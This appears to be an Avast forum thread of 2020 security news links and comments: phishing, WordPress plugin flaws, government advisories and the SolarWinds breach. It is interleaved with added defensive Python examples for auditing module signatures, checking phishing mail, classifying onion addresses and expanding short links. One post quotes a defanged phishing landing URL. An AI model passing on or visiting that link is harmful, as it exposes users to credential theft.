From user mode one can get access to the call table via a sys call and get sys open.
Auditing and kernel file signing protect against such malware modules and toolkits worked by state agents,
read: https://www.oracle.com/technical-resources/articles/linux/signed-kernel-modules.html
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
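Added example, not from the post or from the NSA/FBI advisory: a Linux audit script in the spirit of the module-signing advice above. It reads the kernel knobs that say whether unsigned modules can load at all, and parses modinfo output to list loaded modules that carry no signature. The modinfo samples are constructed; the module names in them are made up for the example. A rootkit that hides its module will not show up in the list, which is exactly why the enforcement status is the more important half.

```python
import os
import shutil
import subprocess

# Kernel knobs that decide whether an unsigned module can be loaded at all.
# A hidden module never appears in /proc/modules, so these matter more than listing.
ENFORCE_FILES = {
    "sig_enforce": "/sys/module/module/parameters/sig_enforce",  # "Y" = only signed modules load
    "lockdown": "/sys/kernel/security/lockdown",                  # "none [integrity] confidentiality"
    "modules_disabled": "/proc/sys/kernel/modules_disabled",      # "1" = loading switched off for good
}


def signature_enforcement_status(files=ENFORCE_FILES):
    """Read each knob; None means the file is absent (old kernel, or a container)."""
    status = {}
    for name, path in files.items():
        try:
            with open(path) as fh:
                status[name] = fh.read().strip()
        except OSError:
            status[name] = None
    return status


def parse_modinfo(text):
    """Turn 'key: value' lines from modinfo into a dict (first occurrence wins)."""
    info = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")     # sig_key values contain colons themselves
        if sep:
            info.setdefault(key.strip(), value.strip())
    return info


def unsigned_modules(modinfo_by_name):
    """Names of modules whose modinfo carries no sig_key, i.e. were never signed."""
    return sorted(name for name, text in modinfo_by_name.items()
                  if not parse_modinfo(text).get("sig_key"))


def collect_live_modinfo():
    """Gather modinfo for every module in /proc/modules (Linux host with modinfo only)."""
    if not shutil.which("modinfo") or not os.path.exists("/proc/modules"):
        return {}
    out = {}
    with open("/proc/modules") as fh:
        for line in fh:
            name = line.split()[0]
            proc = subprocess.run(["modinfo", name], capture_output=True, text=True)
            out[name] = proc.stdout if proc.returncode == 0 else ""
    return out


# Constructed modinfo output; "vboxdrv" and "hidden_io" here are made-up examples.
SAMPLE_MODINFO = {
    "xfs": """\
filename:       /lib/modules/5.4.0/kernel/fs/xfs/xfs.ko
license:        GPL
signer:         Build time autogenerated kernel key
sig_key:        1A:2B:3C:4D
sig_hashalgo:   sha512
""",
    "vboxdrv": """\
filename:       /lib/modules/5.4.0/misc/vboxdrv.ko
license:        GPL
""",
    "hidden_io": """\
filename:       /tmp/hidden_io.ko
license:        GPL
""",
}

if __name__ == "__main__":
    print("enforcement:", signature_enforcement_status())
    live = collect_live_modinfo() or SAMPLE_MODINFO
    print("unsigned modules:", unsigned_modules(live))
```

A result where sig_enforce is "N" (or absent) and the unsigned list is non-empty means any root-level process could have loaded its own module; the fix is Secure Boot with module signature enforcement, as the linked Oracle article describes, not just cleaning the list.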
-
Spam filter in G-mail is slipping
I received the following email today,
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/16/16/45/cYjDDGGHna/preview.jpg)
This is an obvious Phishing attempt. It was sent from
a no-reply <ravagepuff(at)ravagepuff.com> e-mail address
and obviously has nothing to do with UPS.
The OK and other links lead you to the following web address,
hxxps://silvadi-5488.s3.us-east-2.amazonaws.com/11.html#qs=r-acacaeffekjgadggkibhfaefgfiabaefgfiabaefacbhaccajdfacfjjahhidcacb.
(I've broken the actual link on purpose)
The only reward you'll get by following any of these links is an empty bank account and Identity theft.
Always treat any email you receive with suspicion and prevent getting hacked or having your identity stolen.
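Added example, not from the post above: a small checker for the two tells described in it, a sender address that has nothing to do with the claimed brand and links that lead to a host unrelated to that brand. The message is constructed (the domains are not the real ones from the phish), and the registrable-domain helper is a deliberate simplification (no public-suffix list), an assumption of this example.

```python
import email
import email.utils
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _LinkCollector(HTMLParser):
    """Collect every href from <a> tags in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)


def registrable(host):
    """Last two labels of a hostname ('www.ups.com' -> 'ups.com').
    Simplification for the example: a real checker would use the public suffix list."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def audit_message(raw, claimed_brand_domain):
    """Return findings for a message that claims to come from claimed_brand_domain."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    sender = email.utils.parseaddr(str(msg["From"]))[1]
    sender_domain = registrable(sender.split("@")[-1])
    if sender_domain != claimed_brand_domain:
        findings.append(f"sender domain {sender_domain} is not {claimed_brand_domain}")

    body = msg.get_body(preferencelist=("html", "plain"))
    collector = _LinkCollector()
    collector.feed(body.get_content() if body else "")
    for href in collector.links:
        url = urlparse(href)
        if url.scheme not in ("http", "https"):
            continue                                  # mailto:, tel:, anchors
        if url.scheme == "http":
            findings.append(f"link is not https: {href}")
        if registrable(url.hostname or "") != claimed_brand_domain:
            findings.append(f"link leads away from {claimed_brand_domain}: {href}")
    return findings


# Constructed message modelled on the post: brand says UPS, sender and link say otherwise.
SAMPLE_EMAIL = """\
From: UPS Delivery <no-reply@ravagepuff.example>
To: victim@example.org
Subject: Your parcel is waiting
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your package could not be delivered. Confirm your details to reschedule.</p>
<p><a href="https://bucket-5488.s3.example-cloud.test/11.html#qs=abc">OK</a></p>
<p><a href="https://www.ups.com/track">Track your parcel</a></p>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_message(SAMPLE_EMAIL, "ups.com"):
        print("-", finding)
```

The second link passes because it really is under ups.com; phishers often mix a few genuine links in with the one that matters, so a single off-brand link is already enough reason to delete the mail.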
-
Weekly Security News Roundup w/e 8-14-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/17/18/29/cYjbFUGs0Y/preview.jpg) (https://youtu.be/j_zqzO7tCGc)
https://youtu.be/j_zqzO7tCGc
-
Thousands and thousands of WordPress sites vulnerable.
Re: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
Vulnerable plug-ins should now have been patched.
An ongoing drama, this PHP-based WordPress content management software in the hands of those
that do not know how to configure it properly or maintain it, keep it updated and fully patched (plug-ins).
Know about the many websites that now launch malcode like Emotet malware and Heodo malcode:
See: https://urlhaus.abuse.ch/browse/
Lots of times we see WP sites with outdated kernel versions, outdated or even left-over plug-in code,
user enumeration not set to "disabled", nor directory listing. Look here for reported websites:
Check your Word Press website against this scanner: https://hackertarget.com/wordpress-security-scan/
Important: https://www.wordfence.com/blog/2020/08/wordpress-auto-updates-what-do-you-have-to-lose/
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/
Given this is about the Remote Access Service, something which isn't available to Windows 10 Home users, I wonder if it would even be offered to Win10 Home users?
That said, this is for Windows 8.1 versions, and I don't know if the same would apply for Windows 8.1 Home users not having the remote access function.
-
Microsoft issues out of band KB4578013 Windows security update
https://www.bleepingcomputer.com/news/security/microsoft-issues-out-of-band-kb4578013-windows-security-update/
The KB4578013 security update fixes two Windows Remote Access elevation of privilege vulnerabilities affecting
all supported versions of Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2.
-
Weekly Security News Roundup w/e 8-21-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/08/22/12/48/cYj3lJmDoj/preview.jpg) (https://youtu.be/WaNdJ50bP7c)
https://youtu.be/WaNdJ50bP7c
-
25 Top Most Dangerous Weaknesses: https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html
See image attached.
polonus
-
Fake Malwarebytes installation files distributing coinminer
https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer
-
Still some 20.000 WordPress WooCommerce websites at risk through a vulnerable outdated plug-in by the name of "Discount Rules":
https://wordpress.org/plugins/woo-discount-rules/
Detected by security firm webarxsecurity, read: https://www.webarxsecurity.com/multiple-vulnerabilities-in-discount-rules-for-woocommerce-plugin/
The Discount Rules for WooCommerce plugin (versions 2.0.2 and below) suffers from multiple vulnerabilities such as SQL injection, authorization issues and unauthenticated stored cross-site scripting.
In this scenario, the unauthenticated stored cross-site scripting issue could potentially lead to remote code execution.
Check at https://hackertarget.com/wordpress-security-scan/
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
-
Alert (AA20-239A) - FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks
https://us-cert.cisa.gov/ncas/alerts/aa20-239a
-
Slack fixes 'critical' vulnerability that left desktop app users open to attack
https://mashable.com/article/slack-fixes-critical-remote-code-execution-vulnerabilitybug-bounty/
-
Apple mistakenly approved a widely used malware to run on Macs
https://techcrunch.com/2020/08/31/apple-notarized-mac-malware/
-
Over 400 GOV.UK domains found on spam blacklists
https://www.bleepingcomputer.com/news/security/over-400-govuk-domains-found-on-spam-blacklists/
-
Cybercriminal greeners from Iran attack companies worldwide for financial gain
https://www.group-ib.com/media/iran-cybercriminals
-
Microsoft Defender can ironically be used to download malware
https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/
-
Weekly Security News Roundup W/E 9.4.2020
https://podcasts.apple.com/us/podcast/weekly-security-news-roundup-w-e-9-4-2020/id1511579697?i=1000490094741
-
Windows 10 Sandbox activation enables zero-day vulnerability
https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/
-
Windows 10 Sandbox activation enables zero-day vulnerability
https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/
If this is activated you could be vulnerable.
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/08/14/26/cYQj2OHEmZ/preview.jpg)
-
Three governmental warnings against emotet malware attacks (France, Japan and New-Zealand):
Read: https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/
and https://twitter.com/CERT_FR/status/1303011855187742722
and https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/
Advice is to disable macros in Windows Office completely, and/or only allow digitally signed macros.
Also PowerShell should be configured so that it is only allowed to run signed scripts.
A good resource for reported emotet malcode online can be found at URLHaus.
Visit: https://urlhaus.abuse.ch/browse/ and scan with emotet as query.
Indeed Windows Office MS macro is the bitch.
That is why I run Voodoo Shield and use open source LibreOffice.
And I do not run my OS as admin, but as normal user.
Yep, Linux OS is more secure, when rightly configured by a user who knows what she or he is doing.
It has never come under so much attack as Microsoft Windows has.
But that again is quite another topic.
Again forewarned means forearmed.
polonus
-
Security News Roundup for the Week Ending 9-11-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/11/14/10/cYQX26JfKk/preview.jpg) (https://youtu.be/QdlpvMYm3SI)
https://youtu.be/QdlpvMYm3SI
-
Some 140.000 and even more WordPress CMS websites with a vulnerable File Manager plug-in
open to log-in password stealing malware.
Read: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/
Info source: Defiant's Ram Gall,
polonus
-
Some 140.000 and even more WordPress CMS websites with a vulnerable File Manager plug-in
open to log-in password stealing malware.
Read: https://www.wordfence.com/blog/2020/09/attackers-fight-for-control-of-sites-targeted-in-file-manager-vulnerability/
Info source: Defiant's Ram Gall,
polonus
I guess you didn't look at my post. It was covered. :)
https://youtu.be/QdlpvMYm3SI
-
Windows 10 ‘Finger’ command can be abused to download or steal files
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
-
Windows 10 ‘Finger’ command can be abused to download or steal files
https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
So how did they get into your computer to start executing these commands?
-
Alert (AA20-258A) - Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity
https://us-cert.cisa.gov/ncas/alerts/aa20-258a
-
Weekly Security News Roundup w/e 9/18/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/18/16/21/cYQFDrJKTO/preview.jpg) (https://youtu.be/UKHIqmZLOI4)
https://youtu.be/UKHIqmZLOI4
-
The Windows XP source code was allegedly leaked online
https://www.bleepingcomputer.com/news/microsoft/the-windows-xp-source-code-was-allegedly-leaked-online/
-
Weekly Security News Roundup w/e 9-25-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/09/25/14/48/cYQT2JdvSw/preview.jpg) (https://youtu.be/SWe7cuhRzN8)
https://youtu.be/SWe7cuhRzN8
-
Linux under WSL2 can be leaking
https://mullvad.net/en/blog/2020/9/30/linux-under-wsl2-can-be-leaking/
-
NVIDIA fixes high severity flaws in Windows display driver
https://www.bleepingcomputer.com/news/security/nvidia-fixes-high-severity-flaws-in-windows-display-driver/
-
Weekly Security News Roundup w/e 10-2-2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/02/14/45/cY6n2GK6y1/preview.jpg) (https://youtu.be/RAYDrEpF4UA)
https://youtu.be/RAYDrEpF4UA
-
Online avatar service Gravatar allows mass collection of user info
https://www.bleepingcomputer.com/news/security/online-avatar-service-gravatar-allows-mass-collection-of-user-info/
-
New Flaws in Top Antivirus Software Could Make Computers More Vulnerable
https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html
-
New Flaws in Top Antivirus Software Could Make Computers More Vulnerable
https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html
It's nice to see that Avast isn't on the list. :)
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/06/14/52/cY612sKvmB/preview.jpg)
-
Alert (AA20-280A) - Emotet Malware
https://us-cert.cisa.gov/ncas/alerts/aa20-280a
-
Why does browser developer Brave launch its own version 2 (less secure) website on the Tor network?
The address Brave chose = -http://brave5t5rjjg3s6k.onion/
The outdated Tor v2 .onion services protocol (with the short .onion address consisting of a string of 16 characters) will be phased out in the year 2021. Therefore you'd better register the longer v3 .onion addresses (56 characters long) when available. Existing v2 onion addresses will function as long as the Tor network support for them lasts (ending July 15th of 2021), and then will become obsolete. The newer v3 protocol is much more secure than the previous one was.
(info source: credits for this info go to anonymous on Security dot nl)
As humankind's understanding of math and cryptography evolved, the foundation of version 2 became fragile and at this point in time, unsafe. If you want to read more about the technical problems that version 2 faces, please read this post and don't hesitate to ask questions if any.
Read: https://blog.torproject.org/v2-deprecation-timeline
polonus
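Added example, not from the post or from the Tor Project: a classifier that tells the two address generations apart by the label lengths the post gives (16 and 56 characters) and, for v3, verifies the checksum that is built into the address. The v3 layout it decodes (32-byte public key, 2-byte SHA3-256 checksum over ".onion checksum" + key + version, 1-byte version 3) is the published v3 format; the demo v3 address is built from a constructed key and belongs to no real service.

```python
import base64
import hashlib
from urllib.parse import urlsplit

V2_LEN, V3_LEN = 16, 56            # base32 label lengths stated in the post
CHECKSUM_PREFIX = b".onion checksum"


def onion_label(addr):
    """Strip scheme/path and the .onion suffix, returning the lowercase base32 label."""
    host = addr.strip().lower()
    if "://" in host:
        host = urlsplit(host).hostname or ""
    host = host.rstrip("/")
    if not host.endswith(".onion"):
        raise ValueError(f"not an .onion address: {addr}")
    return host[: -len(".onion")]


def classify_onion(addr):
    """Return {'version': 2|3|None, 'checksum_ok': bool|None} for an onion address."""
    label = onion_label(addr)
    if len(label) == V2_LEN:
        # v2 (deprecated, support ends in 2021 per the post) carries no checksum at all.
        return {"version": 2, "checksum_ok": None}
    if len(label) == V3_LEN:
        raw = base64.b32decode(label.upper())          # 35 bytes: key(32) | checksum(2) | version(1)
        pubkey, checksum, version = raw[:32], raw[32:34], raw[34:35]
        expected = hashlib.sha3_256(CHECKSUM_PREFIX + pubkey + version).digest()[:2]
        return {"version": 3 if version == b"\x03" else None,
                "checksum_ok": checksum == expected}
    return {"version": None, "checksum_ok": None}


def encode_v3(pubkey):
    """Build a v3 address from a 32-byte ed25519 public key (here a constructed key)."""
    if len(pubkey) != 32:
        raise ValueError("v3 onion keys are 32 bytes")
    version = b"\x03"
    checksum = hashlib.sha3_256(CHECKSUM_PREFIX + pubkey + version).digest()[:2]
    return base64.b32encode(pubkey + checksum + version).decode("ascii").lower() + ".onion"


BRAVE_V2 = "http://brave5t5rjjg3s6k.onion/"    # the v2 address quoted in the post
DEMO_V3 = encode_v3(bytes(range(32)))          # constructed key, not a real hidden service

if __name__ == "__main__":
    for addr in (BRAVE_V2, DEMO_V3):
        print(addr, "->", classify_onion(addr))
```

A v2 address gives the client nothing to verify against, which is one reason the post calls v3 "much more secure": with v3 a single mistyped character in a shared link fails the checksum instead of silently pointing at a different service.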
-
Weekly Security News Roundup w/e 10/9/2020
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/10/10/20/29/cY66YUKNmI/preview.jpg) (https://youtu.be/LMYMmjIa07k)
https://youtu.be/LMYMmjIa07k
-
US Cyber Command: Patch Windows 'Bad Neighbor' TCP/IP bug now
https://www.bleepingcomputer.com/news/security/us-cyber-command-patch-windows-bad-neighbor-tcp-ip-bug-now/
-
What is your password ;D
https://www.youtube.com/watch?v=RfAdux3XidM&feature=youtu.be
-
What is your password ;D
https://www.youtube.com/watch?v=RfAdux3XidM&feature=youtu.be
I liked the ZOOM commercial that preceded the video. :)
-
Barnes & Noble hit by cyberattack that exposed customer data
https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-cyberattack-that-exposed-customer-data/
-
https://youtu.be/RWLDG0qNJiM
-
FBI warns of newly registered domains spoofing US Census Bureau
https://www.bleepingcomputer.com/news/security/fbi-warns-of-newly-registered-domains-spoofing-us-census-bureau/
-
NSA Warns Chinese State-Sponsored Malicious Cyber Actors Exploiting 25 CVEs
https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/
https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF
-
Security Bulletin: NVIDIA GeForce Experience - October 2020
https://nvidia.custhelp.com/app/answers/detail/a_id/5076
-
Weekly Security News Roundup w/e 10-23-2020
https://youtu.be/f6rXDmnXIFs
-
On computer startup, the common Adobe Flash Player update box opened. It mentioned the end of Flash Player at year's end, and gave the option to update or uninstall if not using Flash-based content on my computer.
I chose to uninstall, as I could always reinstall later if need be. AVAST came up with a warning: "Threat Blocked - We've blocked INSTALLFLASHPLAYER.EXE because it was infected with IDP.Generic - what would you like to do, 'move to virus chest' (which I did) or 'more options - create an exception'."
Is this happening to everyone, i.e. is it an AVAST false positive?
-
@dougjp,
No, I did not get any Avast warning when I uninstalled Flash Player when prompted.
If you have the offending .exe in your virus chest, then you should be able to submit it for analysis from there.
See:
https://support.avast.com/en-ww/article/Use-Antivirus-Virus-Chest#idt_40
PS: The best place to ask questions like yours is in the "Virus and Worms" section of the forum.
https://forum.avast.com/index.php?board=4.0
-
Massive Nitro data breach impacts Microsoft, Google, Apple, more
https://www.bleepingcomputer.com/news/security/massive-nitro-data-breach-impacts-microsoft-google-apple-more/
-
Amazon Fired Employee for Leaking Customer Emails
https://www.vice.com/en/article/dy8zwz/amazon-fired-employee-leaking-customer-emails
-
Weekly Security News Roundup w/e 10-30-2020
https://youtu.be/8NxcHESYsjA
-
Windows kernel zero-day vulnerability used in targeted attacks
https://www.bleepingcomputer.com/news/security/windows-kernel-zero-day-vulnerability-used-in-targeted-attacks/
-
Hacker is selling 34 million user records stolen from 17 companies
https://www.bleepingcomputer.com/news/security/hacker-is-selling-34-million-user-records-stolen-from-17-companies/
-
Windows kernel zero-day vulnerability used in targeted attacks
https://www.bleepingcomputer.com/news/security/windows-kernel-zero-day-vulnerability-used-in-targeted-attacks/
While Microsoft has confirmed that the reported attack is real, it also suggests that it is limited in scope being targeted in nature. This is not, at least as of yet, a widespread broad-sweep exploit. Microsoft says that it has no evidence of any indication of widespread exploits.
The attack requires two vulnerabilities to be chained together for a successful exploit to happen. One of them has already been patched. That was a browser-based vulnerability, CVE-2020-15999, in Chrome browsers, including Microsoft Edge. As long as your browser is up to date, you are protected. Microsoft Edge was updated on October 22 (https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002) while Google Chrome was updated on October 20 (https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html).
(It's easy to spread doom and gloom. It takes a bit more effort to tell the whole story.)
-
Weekly Security News Roundup w/e 11-6-2020
https://youtu.be/OoIVf1Ue1cU
-
HMRC smishing tax scam targets UK banking customers
https://www.bleepingcomputer.com/news/security/hmrc-smishing-tax-scam-targets-uk-banking-customers/
-
Critical Privilege Escalation Vulnerabilities Affect 100K Sites Using Ultimate Member Plugin
https://www.wordfence.com/blog/2020/11/critical-privilege-escalation-vulnerabilities-affect-100k-sites-using-ultimate-member-plugin/
-
Fraudulent Minecraft apps deceive millions of Google Play users
https://blog.avast.com/fraudulent-minecraft-apps-on-google-play-avast
https://press.avast.com/fraudulent-minecraft-related-apps-deceive-millions-of-google-play-users-avast-warns
-
5.8 million RedDoorz user records for sale on hacking forum
https://www.bleepingcomputer.com/news/security/58-million-reddoorz-user-records-for-sale-on-hacking-forum/
-
Animal Jam kids' virtual world hit by data breach, impacts 46M accounts
https://www.bleepingcomputer.com/news/security/animal-jam-kids-virtual-world-hit-by-data-breach-impacts-46m-accounts/
-
Report: Hotel Reservation Platform Leaves Millions of People Exposed in Massive Data Breach
https://www.websiteplanet.com/blog/prestige-soft-breach-report/
-
Avast Security News Roundup w/e 11-13-2020
https://youtu.be/_06fkM-HlvI
-
Hacker shares 3.2 million Pluto TV accounts for free on forum
https://www.bleepingcomputer.com/news/security/hacker-shares-32-million-pluto-tv-accounts-for-free-on-forum/
-
IRS Impersonation Payment Fraud
https://abnormalsecurity.com/blog/irs-impersonation-payment-fraud/
-
IRS Impersonation Payment Fraud
https://abnormalsecurity.com/blog/irs-impersonation-payment-fraud/
As old as the Nigerian scam. Unfortunately, both still filch victims out of a lot of money.
The IRS fraud uses fear. The Nigerian scam uses greed.
-
Large-Scale Attacks Target Epsilon Framework Themes
https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
-
Large-Scale Attacks Target Epsilon Framework Themes
https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
When you don't update, you're susceptible to old vulnerabilities.
-
Avast Security News Roundup w/e 11-20-2020
https://youtu.be/3OeeGm9Dmic
-
Report: Spotify Targeted in Potential Fraud Scheme
https://www.vpnmentor.com/blog/report-spotify-scam/
-
Spoofed FBI Internet Domains Pose Cyber and Disinformation Risks
https://www.ic3.gov/Media/Y2020/PSA201123
-
Windows 7 and Server 2008 zero-day bug gets a free patch
https://www.bleepingcomputer.com/news/security/windows-7-and-server-2008-zero-day-bug-gets-a-free-patch/
-
Security News Roundup w/e 11/27/2020
https://youtu.be/kxrjUEq__nw
-
GO SMS Pro Vulnerable to Media File Theft
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/go-sms-pro-vulnerable-to-media-file-theft/
-
Today is Computer Security Day
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/11/30/21/27/cYXvrtN1b4/preview.jpg)
Is your computer secure (https://nationaldaycalendar.com/computer-security-day-november-30/?fbclid=IwAR0mKv8fqf2o11LvqcLCehz5OeelD8SpOwAvdXF_5RFWAw8qa_PQAohf1XY)?
-
Alert (AA20-336A) - Advanced Persistent Threat Actors Targeting U.S. Think Tanks
https://us-cert.cisa.gov/ncas/alerts/aa20-336a
-
FBI: You may be a money mule and not even know it
https://www.bleepingcomputer.com/news/security/fbi-you-may-be-a-money-mule-and-not-even-know-it/
-
FireEye Shares Details of Recent Cyber Attack, Actions to Protect Community
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
-
Russian State-Sponsored Malicious Cyber Actors Exploit Known Vulnerability in Virtual Workspaces
https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2434988/russian-state-sponsored-malicious-cyber-actors-exploit-known-vulnerability-in-v/
https://media.defense.gov/2020/Dec/07/2002547071/-1/-1/0/CSA_VMWARE%20ACCESS_U_OO_195076_20.PDF
-
Insecure Communication in WinZip 24 Could Lead to Malware
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/insecure-communication-in-winzip-24-could-lead-to-malware/
-
Third Party Browser Extensions for Instagram, Facebook, Vimeo and Others Infected with Malware
https://press.avast.com/third-party-browser-extensions-from-instagram-facebook-vimeo-and-others-infected-with-malware
-
Be careful, the crooks are out there just waiting for you.
(https://d1ka0itfguscri.cloudfront.net/Lh/2020/12/17/12/43/cYlbl58v2F/preview.jpg)
All the links lead to bitly shortened addresses waiting to steal your information.
There is no check. Trust nothing verify everything.
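One way to do the check the post above says is missing, as an added example that is not part of the original post: resolve a shortened link hop by hop with HEAD requests, never fetching a page body, and report where it really lands. The shortener host list and the `link-preview/1.0` user agent are assumptions; the redirect chain in the self-test is constructed and does not contact the network.

```python
import http.client
from typing import Callable, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# Assumed list of hosts that mask a destination; extend it for your environment.
KNOWN_SHORTENERS = {"bit.ly", "bitly.com", "t.co", "tinyurl.com", "goo.gl", "ow.ly", "is.gd", "cutt.ly"}

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# A "head" function maps a URL to (HTTP status, Location header or None).
Head = Callable[[str], Tuple[int, Optional[str]]]


def head_request(url: str, timeout: float = 5.0) -> Tuple[int, Optional[str]]:
    """Send one HEAD request and return (status, Location) without following anything."""
    parts = urlsplit(url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        conn.request("HEAD", path, headers={"User-Agent": "link-preview/1.0"})
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def is_shortener(url: str) -> bool:
    """True when the link's host is one of the known URL shorteners."""
    return (urlsplit(url).hostname or "").lower() in KNOWN_SHORTENERS


def expand_redirects(url: str, head: Head = head_request, max_hops: int = 10) -> List[str]:
    """Return every URL visited, starting with `url`.

    Stops at the first non-redirect answer, at a redirect without Location,
    or after max_hops hops (which also bounds redirect loops). Relative
    Location values are resolved against the URL that sent them.
    """
    chain = [url]
    for _ in range(max_hops):
        status, location = head(chain[-1])
        if status not in REDIRECT_STATUSES or not location:
            break
        chain.append(urljoin(chain[-1], location))
    return chain


def final_destination(url: str, head: Head = head_request) -> str:
    """The last URL in the redirect chain, i.e. where a click would end up."""
    return expand_redirects(url, head)[-1]


if __name__ == "__main__":
    import sys
    for link in sys.argv[1:]:
        flag = "shortener" if is_shortener(link) else "direct"
        print(flag, " -> ".join(expand_redirects(link)))
```

Some shorteners answer HEAD with 405; in that case repeat the hop with GET and discard the body. Treat any chain that ends on a host you did not expect, or that exceeds the hop limit, as a reason not to click.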
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
-
Weekly Security News Roundup w/e 12-18-2020
https://youtu.be/BgD8oTAOtWU
This was a very busy (bad) week.
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
SolarWinds hackers breach US nuclear weapons agency
https://www.bleepingcomputer.com/news/security/solarwinds-hackers-breach-us-nuclear-weapons-agency/
Microsoft confirms breach in SolarWinds hack, denies infecting others
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-breach-in-solarwinds-hack-denies-infecting-others/
Alert (AA20-352A) - Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://us-cert.cisa.gov/sites/default/files/publications/AA20-352A-APT_Compromise_of_Government_Agencies%2C_Critical%20Infrastructure%2C_and_Private_Sector_Organizations.pdf
Quite possibly tip of the 'Iceberg'
-
FBI, CISA officially confirm US govt hacks after SolarWinds breach
https://www.bleepingcomputer.com/news/security/fbi-cisa-officially-confirm-us-govt-hacks-after-solarwinds-breach/
